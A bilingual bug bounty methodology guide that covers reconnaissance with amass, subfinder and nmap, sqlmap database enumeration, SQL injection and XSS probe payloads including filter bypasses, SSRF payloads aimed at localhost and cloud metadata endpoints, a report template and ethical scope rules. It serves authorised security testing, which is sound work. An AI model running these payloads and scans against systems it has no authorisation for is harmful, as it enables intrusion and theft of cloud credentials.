Bug Bounty Program Specialist
Эксперт по исследованию уязвимостей и bug bounty hunting.
Методология тестирования
OWASP Top 10 Focus
- Injection (SQL, NoSQL, LDAP, OS commands)
- Broken Authentication
- Sensitive Data Exposure
- XML External Entities (XXE)
- Broken Access Control
- Security Misconfiguration
- Cross-Site Scripting (XSS)
- Insecure Deserialization
- Using Components with Known Vulnerabilities
- Insufficient Logging & Monitoring
Распределение усилий
- Reconnaissance: 30%
- Manual testing: 50%
- Automated scanning: 20%
Reconnaissance
Subdomain Enumeration
# Пассивное перечисление
amass enum -passive -d target.com -o subdomains.txt
# Активное перечисление
subfinder -d target.com -all -o subfinder.txt
# DNS брутфорс
gobuster dns -d target.com -w wordlist.txt -o gobuster.txt
# Объединение результатов
cat subdomains.txt subfinder.txt gobuster.txt | sort -u > all_subs.txt
Technology Stack Identification
# Wappalyzer CLI
wappalyzer https://target.com
# WhatWeb
whatweb -a 3 https://target.com
# Nuclei technology detection
nuclei -u https://target.com -t technologies/
Port Scanning
# Быстрое сканирование
nmap -sS -sV -O -p- --min-rate 1000 target.com -oA nmap_full
# Сканирование сервисов
nmap -sC -sV -p 80,443,8080,8443 target.com -oA nmap_services
SQL Injection Testing
Manual Detection
-- Error-based
' OR '1'='1
' AND '1'='2
' UNION SELECT NULL--
-- Time-based blind
'; WAITFOR DELAY '00:00:05'--
' OR SLEEP(5)--
-- Boolean-based blind
' AND 1=1--
' AND 1=2--
SQLMap
# Basic injection test
sqlmap -u "https://target.com/page?id=1" --batch
# With authentication
sqlmap -u "https://target.com/page?id=1" --cookie="session=abc123" --batch
# POST data
sqlmap -u "https://target.com/login" --data="user=test&pass=test" --batch
# Database enumeration
sqlmap -u "https://target.com/page?id=1" --dbs --batch
sqlmap -u "https://target.com/page?id=1" -D dbname --tables --batch
XSS Testing
Payload Types
// Reflected XSS
<script>alert('XSS')</script>
<img src=x onerror=alert('XSS')>
<svg onload=alert('XSS')>
// DOM-based XSS
javascript:alert('XSS')
data:text/html,<script>alert('XSS')</script>
// Bypass filters
<ScRiPt>alert('XSS')</ScRiPt>
<img src=x onerror="alert('XSS')">
<svg/onload=alert('XSS')>
// Stored XSS via different contexts
"><script>alert('XSS')</script>
'-alert('XSS')-'
</title><script>alert('XSS')</script>
Context-Specific Payloads
// In HTML attribute
" onfocus=alert('XSS') autofocus="
' onfocus=alert('XSS') autofocus='
// In JavaScript string
';alert('XSS');//
"-alert('XSS')-"
// In URL parameter
javascript:alert('XSS')
data:text/html,<script>alert('XSS')</script>
SSRF Testing
Basic Payloads
# Localhost bypass
http://127.0.0.1
http://localhost
http://[::1]
http://0.0.0.0
http://127.1
http://0177.0.0.1
# Cloud metadata
http://169.254.169.254/latest/meta-data/
http://metadata.google.internal/
Detection Methods
# Out-of-band detection using Burp Collaborator
url = "http://your-collaborator-id.burpcollaborator.net"
# Webhook.site for testing
url = "https://webhook.site/unique-id"
Report Writing
Structure
# Vulnerability Report
## Summary
[One-line description]
## Severity
[Critical/High/Medium/Low] - CVSS Score: X.X
## Affected Component
[URL/Endpoint/Feature]
## Description
[Detailed technical explanation]
## Steps to Reproduce
1. [Step 1]
2. [Step 2]
3. [Step 3]
## Proof of Concept
[Screenshots, code, requests]
## Impact
[Business/technical impact]
## Remediation
[Specific recommendations]
## References
[CVE, OWASP, etc.]
CVSS Calculator Factors
- Attack Vector (AV): Network/Adjacent/Local/Physical
- Attack Complexity (AC): Low/High
- Privileges Required (PR): None/Low/High
- User Interaction (UI): None/Required
- Scope (S): Unchanged/Changed
- Confidentiality Impact (C): None/Low/High
- Integrity Impact (I): None/Low/High
- Availability Impact (A): None/Low/High
Tools Checklist
Reconnaissance
Web Testing
Automation
Ethical Guidelines
- Stay in scope — тестируйте только разрешенные цели
- Don't be destructive — избегайте DoS и потери данных
- Protect data — не распространяйте найденные данные
- Report responsibly — следуйте disclosure policy
- Document everything — ведите детальные записи
- Respect rate limits — не перегружайте системы
Program Selection Strategy
Criteria
- Response time history
- Bounty amounts
- Scope breadth
- Program maturity
- Community feedback
Priority Matrix
| Program Type |
Skill Level |
Potential |
| New programs |
Any |
High |
| Broad scope |
Intermediate |
Medium |
| Narrow scope |
Expert |
Low-Medium |
| VDP only |
Beginner |
Low |